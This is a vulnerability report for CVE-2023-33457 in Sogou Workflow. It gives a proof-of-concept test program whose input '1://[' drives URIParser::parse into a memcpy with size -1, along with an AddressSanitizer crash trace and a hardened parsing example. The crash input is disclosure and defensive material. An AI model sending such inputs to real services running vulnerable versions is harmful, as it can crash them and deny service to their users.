CVE-2023-33457: Vuln: memcpy a negtive size in URIParser::parse · Issue #1272 · sogou/workflow

In Sogou Workflow v0.10.6, memcpy is called with a negative size in URIParser::parse, which may cause a buffer overflow and crash.


1. Compile the program with ASan, using the compile and link flag "-fsanitize=address".

test.cc:
#include "workflow/WFTaskFactory.h"
#include "workflow/WFDnsClient.h"
#include <string>

int main(){
    // Crash input: a URI whose authority ends with an unterminated '['
    std::string url = "1://[";
    // Creating the DNS task runs URIParser::parse on the URL
    auto *task = WFTaskFactory::create_dns_task(url, 0, NULL);
    (void)task;
}

compile the test.cc with the workflow lib and run:
g++ -fsanitize=address -g ./test.cc -I …/_include/ …/_lib/libworkflow.a -o testrun …/…/openssl-3.07/libssl.a …/…/openssl-3.07/libcrypto.a

ASan finds the crash:
==1736885==ERROR: AddressSanitizer: negative-size-param: (size=-1)
#0 0x7ff0611ba3ff in __interceptor_memcpy …/…/…/…/src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
#1 0x55fd6300dd49 in URIParser::parse(char const*, ParsedURI&) /opt1/software/toyMan/testcve/workflow/src/util/URIParser.cc:404
#2 0x55fd62fe74c0 in URIParser::parse(std::__cxx11::basic_string<char, std::char_traits, std::allocator > const&, ParsedURI&) (/opt1/software/toyMan/testcve/workflow/test/testcloud+0x1ba4c0)
#3 0x55fd62fe6c87 in WFTaskFactory::create_dns_task(std::__cxx11::basic_string<char, std::char_traits, std::allocator > const&, int, std::function<void (WFNetworkTask<protocol::DnsRequest, protocol::DnsResponse>*)>) /opt1/software/toyMan/testcve/workflow/src/factory/DnsTaskImpl.cc:159
#4 0x55fd62fdb528 in easyloop test.cc:18

crashcase:
"1://[" and other strings ending with '['.

The vuln is in URIParser::parse. This function is missing a check for len at line 404. When '[' is in the URI, it calculates a negative value for len (-1), and may cause a DoS through a crash when memcpy copies huge memory, code execution, and information disclosure.
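As an added example (not code from the Workflow project, and not a reconstruction of the actual URIParser.cc logic, which the report does not show): a hypothetical bracketed-host parser that performs the kind of length check the report says is missing. An unterminated '[' is rejected up front, so no negative length can ever reach memcpy (whose size_t parameter would otherwise receive -1 as SIZE_MAX). The function names host_of and parse_bracketed_host are assumptions made for this example.

```cpp
#include <cstddef>
#include <cstring>
#include <string>

// Hypothetical hardened parser for an authority of the form "[host]..." .
// Returns false on malformed input instead of computing a negative length.
static bool parse_bracketed_host(const std::string& authority, std::string& host) {
    const char* p = authority.c_str();
    if (authority.empty() || *p != '[')
        return false;

    // Look for the closing ']' within the bounds of the authority only.
    const char* close = static_cast<const char*>(
        std::memchr(p, ']', authority.size()));
    if (close == nullptr)
        return false;                 // unterminated '[' (e.g. "1://["): reject, no len = -1

    // Length of the bytes strictly between '[' and ']'.
    std::ptrdiff_t len = close - (p + 1);
    if (len <= 0)
        return false;                 // "[]" is rejected too

    char buf[256];
    if (static_cast<std::size_t>(len) >= sizeof(buf))
        return false;                 // bound the copy to the destination buffer

    // Only now is memcpy called, with a length already proven non-negative and in range.
    std::memcpy(buf, p + 1, static_cast<std::size_t>(len));
    buf[len] = '\0';
    host.assign(buf, static_cast<std::size_t>(len));
    return true;
}

// Extract the host from a URI; returns an empty string when the URI is rejected.
std::string host_of(const std::string& uri) {
    std::string host;
    std::size_t scheme_end = uri.find("://");
    if (scheme_end == std::string::npos)
        return "";

    std::string authority = uri.substr(scheme_end + 3);
    std::size_t slash = authority.find('/');
    if (slash != std::string::npos)
        authority.resize(slash);      // drop the path part

    if (!authority.empty() && authority[0] == '[') {
        if (!parse_bracketed_host(authority, host))
            return "";
        return host;
    }

    // Plain host: strip an optional ":port".
    std::size_t colon = authority.find(':');
    if (colon != std::string::npos)
        authority.resize(colon);
    return authority;
}

int main() {
    // Constructed inputs: the crash string from the report and a well-formed IPv6 URL.
    return (host_of("1://[").empty() && host_of("http://[::1]:8080/x") == "::1") ? 0 : 1;
}
```

The crash input "1://[" and any other authority that opens a '[' without closing it now return an empty host rather than a negative length.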
